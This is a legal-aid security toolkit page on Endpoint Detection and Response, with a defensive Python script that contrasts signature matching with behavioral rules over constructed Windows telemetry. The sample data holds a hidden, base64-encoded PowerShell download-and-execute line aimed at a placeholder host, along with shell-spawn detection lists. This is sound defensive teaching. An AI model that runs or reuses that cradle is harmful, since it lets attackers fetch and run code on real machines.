2022 Legal Aid Security Toolkit


4.1. Security Toolkit: Endpoint Detection and Response (EDR)

Last Updated: 5/05/25


What Everyone Needs to Know


Endpoint Detection and Response (EDR) is the current generation of endpoint protection software and the successor to traditional antivirus. Attackers no longer follow a single, fixed playbook; they change their tools and techniques faster than static signature lists can keep up, so software that only recognizes known malicious files misses much of what they do. EDR agents continuously record what is happening on each laptop, desktop and server (which programs run, what they launch, which files and network connections they touch), flag suspicious behavior, and let staff rapidly investigate and contain a potential security incident.


What IT Needs to Know


EDR provides deep visibility into what is running on every endpoint and lets administrators hunt for, detect and block suspicious activity. It also adds forensic capability: because the agent records events continuously, administrators can rebuild a timeline of what happened on a machine and determine the scope and impact of a breach. Additionally, many cyber insurance carriers now require an EDR solution to be in place before they will write or renew a policy.

EDR improves on traditional antivirus because it judges programs by what they do, not only by what they are. Traditional antivirus matches files against a database of known malware signatures that the vendor must update constantly. That works for threats that have already been seen and catalogued, but not for new or modified ones: a small change to a sample can produce a file that no signature matches. EDR instead records process, file, registry and network events and analyzes their behavior, which lets it detect both known and previously unseen threats. It also reconstructs an attack as a timeline (how it got in, what it did next, what it was trying to reach) and gives you the ability to isolate an affected endpoint from the network, quarantine files and remediate. This is what lets EDR detect and respond to ransomware, fileless attacks and zero-day attacks, described below.

Ransomware encrypts your data and demands a payment for the key to unlock it. Attackers now routinely combine this with exfiltration: they steal copies of your data before encrypting it and threaten to publish it on the dark web if the ransom is not paid, so good backups alone no longer remove their leverage.

Fileless attacks rely on tools that are already present in your environment rather than dropping a new executable, which makes them hard to detect with file signatures and hard to remove. PowerShell, for example, is a built-in Windows tool that administrators use every day, but in the wrong hands it can download and run attacker code entirely in memory. Because EDR watches process behavior (what launched PowerShell, what arguments it was given, what it connected to), it can catch misuse of a legitimate tool that antivirus would never flag.

Zero-day exploits target vulnerabilities that attackers are already exploiting before the software vendor has released a patch. The vendor then scrambles to produce and test a fix, which can take days, and your own systems remain exposed until that patch is applied. These attacks arrive without warning and require immediate attention and action by IT administrators; in the meantime, behavior-based detection is often the only way to notice what the attacker does after exploitation.

In each of these cases, EDR gives administrators the visibility to detect the attack and the tools to respond to it.
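To make the signature-versus-behavior distinction concrete, the following Python script is an added example written for this page; it is not code from LSNTAP or from any EDR vendor. It runs a hash-list check (what antivirus does) and three behavioral rules (what EDR adds) over a constructed sequence of events that resembles Windows process-creation and file telemetry: a macro document spawning PowerShell with an encoded command, followed by a burst of file renames. The event fields, host name, hashes, rule names and thresholds are all illustrative assumptions.

```python
"""Behaviour-based versus signature-based detection over constructed endpoint telemetry.

Added example for this toolkit page; it is not code from LSNTAP or from any EDR
vendor.  The event fields, hosts, hashes, rule names and thresholds are all
constructed assumptions that resemble Windows process-creation and file telemetry.
"""
import base64
import hashlib
import re
from collections import defaultdict

# --- Signature-style check (what traditional antivirus relies on) ------------
# A constructed stand-in for a vendor's signature database.  Nothing in the
# sample events below is on this list, so a pure hash lookup sees nothing.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed-known-sample").hexdigest()}

def signature_match(event):
    """True only if the launched binary's hash is already known bad."""
    return event.get("sha256") in KNOWN_BAD_SHA256

# --- Behaviour-style rules (what EDR adds) -----------------------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 script.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Recover the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def process_rules(event):
    """Rules evaluated on a single process-creation event; returns (rule, detail) pairs."""
    hits = []
    parent, image = event["parent"].lower(), event["image"].lower()
    if parent in OFFICE_APPS and image in SHELLS:       # document spawning a shell
        hits.append(("office_spawns_shell", f"{parent} -> {image}"))
    script = decode_encoded_command(event["cmdline"])   # fileless PowerShell payload
    if script is not None:
        hits.append(("encoded_powershell", script))
    return hits

def rename_burst(events, window=10, threshold=20):
    """Flag a process that renames >= threshold files within `window` seconds:
    the access pattern of an encryptor, whatever binary is doing it."""
    stamps_by_proc = defaultdict(list)
    for e in events:
        if e["event"] == "file_rename":
            stamps_by_proc[(e["host"], e["pid"])].append(e["ts"])
    hits = []
    for (host, pid), stamps in stamps_by_proc.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):                   # sliding window over timestamps
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                hits.append((stamps[hi], host, "rename_burst",
                             f"pid {pid}: {hi - lo + 1} renames in {window}s"))
                break
    return hits

def build_timeline(events):
    """Run every rule and return (ts, host, rule, detail) tuples sorted by time."""
    timeline = []
    for e in events:
        if e["event"] != "process_create":
            continue
        if signature_match(e):
            timeline.append((e["ts"], e["host"], "known_hash", e["image"]))
        for rule, detail in process_rules(e):
            timeline.append((e["ts"], e["host"], rule, detail))
    timeline.extend(rename_burst(events))
    return sorted(timeline)

# --- Constructed telemetry: macro document -> encoded PowerShell -> mass renames
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ts": 100, "host": "wks-07", "event": "process_create", "pid": 4100,
     "parent": "explorer.exe", "image": "WINWORD.EXE", "sha256": "0" * 64,
     "cmdline": r'WINWORD.EXE "C:\Users\jdoe\Downloads\invoice.docm"'},
    {"ts": 103, "host": "wks-07", "event": "process_create", "pid": 4188,
     "parent": "WINWORD.EXE", "image": "powershell.exe", "sha256": "1" * 64,
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
] + [
    {"ts": 110 + i // 4, "host": "wks-07", "event": "file_rename", "pid": 4188,
     "path": rf"C:\Users\jdoe\Documents\file{i}.docx.locked"}
    for i in range(40)
]

if __name__ == "__main__":
    for ts, host, rule, detail in build_timeline(SAMPLE_EVENTS):
        print(f"t={ts:<4} {host:<7} {rule:<22} {detail[:70]}")
```

Run as-is, the hash check fires on nothing, because neither binary is on the list and PowerShell itself is a legitimate signed Microsoft tool, while the behavioral rules produce a three-entry timeline: Word launching PowerShell, the decoded download-and-execute script, and the rename burst from the same process ID. That timeline is the forensic record the text describes. The caveat a practitioner should expect is false positives: administrators do run encoded commands, and backup or sync tools do rename many files quickly, so real products pair rules like these with allow-lists, tuning and analyst review rather than blocking on every hit.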
 

Solutions to Consider


CrowdStrike
SentinelOne
Check Point
VMware
 

Resources
 

“What is Endpoint Detection and Response” (CrowdStrike)
“What Is Endpoint Detection and Response (EDR)?” (McAfee)
